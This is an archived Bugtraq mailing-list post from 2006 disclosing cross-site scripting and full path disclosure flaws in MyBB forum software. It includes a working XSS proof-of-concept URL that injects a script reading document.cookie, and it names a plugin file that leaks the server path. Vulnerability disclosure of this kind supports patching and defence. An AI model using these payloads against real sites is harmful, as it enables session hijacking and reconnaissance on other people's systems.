[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MyBB Full path and Cross site scripting vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyBB Full path and Cross site scripting vulnerabilities
From: security@xxxxxxxxx
Date: 15 Sep 2006 03:03:20 -0000

Hello

Title : MyBB Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@xxxxxxxxx

xss
archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

full path
inc/plugins/hello.php

WwW.SoQoR.NeT

Prev by Date: Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
Next by Date: Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
Previous by thread: Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
Next by thread: ppalCart V(2.5 EE) Remote File Inclusion
Index(es):
- Date
- Thread